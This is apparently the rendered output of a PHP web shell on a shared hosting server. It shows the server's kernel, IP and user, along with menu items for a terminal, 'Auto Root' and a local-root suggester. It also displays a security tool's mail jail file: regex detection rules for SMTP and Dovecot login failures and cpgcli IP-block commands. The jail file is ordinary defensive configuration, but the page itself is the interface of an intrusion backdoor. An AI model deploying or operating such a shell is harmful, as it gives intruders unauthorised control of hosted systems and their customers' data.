Linux res4.skyhost.pk 4.18.0-553.158.1.el8_10.x86_64 #1 SMP Wed Aug 26 03:18:33 EDT 2026 x86_64
LiteSpeed
Server IP : 65.109.66.33 & Your IP : 216.73.217.126
Domains : 334 Domain
User : supercareproduct
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
cpguard /
cpglfd /
configs /
jails.available /
Delete
Unzip
Name
Size
Permission
Date
Action
cpanel.yaml
1.26
KB
-rw-r--r--
2026-06-10 05:54
cwp.yaml
667
B
-rw-r--r--
2026-06-10 05:55
directadmin.yaml
694
B
-rw-r--r--
2026-06-10 05:55
exim.yaml
3.8
KB
-rw-r--r--
2026-06-29 05:50
ftp.yaml
1.33
KB
-rw-r--r--
2026-06-10 05:52
http.yaml
2.82
KB
-rw-r--r--
2026-07-06 06:49
mail.yaml
3.37
KB
-rw-r--r--
2026-06-10 05:53
rspamd.yaml
1.05
KB
-rw-r--r--
2026-06-10 05:54
ssh.yaml
1.54
KB
-rw-r--r--
2026-06-10 05:54
webuzo.yaml
822
B
-rw-r--r--
2026-06-30 07:46
Save
Rename
jails: # ==================================================== # 1. Postfix (SMTP) # Keeps SMTP separate so you can track Spam vs Auth attacks distinctly. # ==================================================== - name: "mail" enabled: true log_paths: - "/var/log/mail.log" - "/var/log/maillog" - "/var/log/postfix.log" rules: - regexp: "warning: .*\\[(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)\\]: SASL .*authentication failed" - regexp: "lost connection after AUTH from .*\\[(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)\\]" max_retries: 10 find_time: "3m" ban_time: "1h" actions: - name: "cpgblock-mail" ban_command: '/usr/bin/cpgcli ip --temp-block {{.IP}} --reason "Blocked by {{.JailName}} due to more than {{.MaxRetry}} abusive access within {{.FindTime}} seconds" --extra " LogFile: {{.LogPath}} | Reason: {{.LogLine}}"' unban_command: "/usr/bin/cpgcli ip --temp-block {{.IP}} --remove" # ==================================================== # 2. Dovecot (Universal: cPanel + DirectAdmin + Standard) # Efficient: Reads log once, catches ALL formats. # ==================================================== - name: "dovecot-universal" enabled: true log_paths: - "/var/log/maillog" - "/var/log/mail.log" - "/var/log/dovecot-info.log" rules: # --- GROUP A: PAM & System Auth (DirectAdmin / Standard) --- # Matches: "auth-worker(admin,1.2.3.4)... pam_authenticate() failed" - regexp: "auth-worker\\(.*,(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)\\).*: pam_authenticate\\(\\) failed" # Matches: "auth(user,1.2.3.4): virtual_user: Password mismatch" - regexp: "auth\\(.*,(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+),.*\\): virtual_user: Password mismatch" # --- GROUP B: Disconnects & Aborted Logins (cPanel / Mixed) --- # Matches: "Disconnected: Connection closed (auth failed... rip=1.2.3.4" # Matches: "Disconnected: Too many bad commands... rip=1.2.3.4" # Matches: "Disconnected: Inactivity... rip=1.2.3.4" - regexp: "(?:imap|pop3)-login: Disconnected:.*(?:auth failed|Too many [a-z]+ commands|Inactivity).* rip=(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)" # Matches: "Login aborted: Logged out (auth failed... rip=1.2.3.4" - regexp: "(?:imap|pop3)-login: Login aborted:.*auth failed.* rip=(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)" # --- GROUP C: Protocol Violations & DoS --- # Matches: "Login aborted: Maximum number of connections... rip=1.2.3.4" - regexp: "(?:imap|pop3)-login: Login aborted: Maximum number of connections.* rip=(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)" # Matches: "Login aborted: Too many invalid commands... rip=1.2.3.4" - regexp: "(?:imap|pop3)-login: Login aborted: Too many (?:invalid|bad) commands.* rip=(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)" # Matches: "Login failed: Cleartext authentication disabled" - regexp: "(?:imap|pop3)-login: Login failed: Cleartext authentication disabled.* rip=(?P<ip>\\d+\\.\\d+\\.\\d+\\.\\d+)" max_retries: 15 find_time: "2m" ban_time: "1h" actions: - name: "cpgblock-dovecot" ban_command: '/usr/bin/cpgcli ip --temp-block {{.IP}} --reason "Blocked by {{.JailName}} due to more than {{.MaxRetry}} abusive access within {{.FindTime}} seconds" --extra " LogFile: {{.LogPath}} | Reason: {{.LogLine}}"' unban_command: "/usr/bin/cpgcli ip --temp-block {{.IP}} --remove"